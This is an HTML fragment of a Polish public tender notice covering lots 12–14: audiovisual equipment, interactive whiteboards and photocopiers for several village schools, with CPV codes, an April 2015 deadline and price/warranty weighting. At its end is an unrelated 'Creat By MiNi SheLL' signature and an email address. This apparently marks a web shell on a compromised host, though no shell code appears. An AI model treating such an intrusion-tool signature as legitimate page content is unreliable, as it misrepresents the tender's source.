<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu ITC  do SP Szufnarowa,  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek, SP Jaszczurowa i SF Jazowa wg załącznika II. 11 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 30.21.31.00-6, 30.23.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa sprzętu audiowizualnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa sprzętu audiowizualnego do SP Szufnarowa, SF Pstragówka,  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek, SF Jazowa wg załącznika II. 12 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.00.00.00-3, 37.31.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa tablic interaktywnych wraz z montażem i oprogramowaniem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa tablic interaktywnych wraz z montażem i oprogramowaniem  do SP Szufnarowa, SF Pstrągówka, SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek, SP Jaszczurowa, SF w Jazowej  wg załącznika II. 13 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Dostawa kserokopiarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa kserokopiarek do SP Szufnarowa,  SP Różanka, SP Markuszowa, SF Niewodna, SF Kozłówek wg załącznika II. 14 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Gwarancja - 0.1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com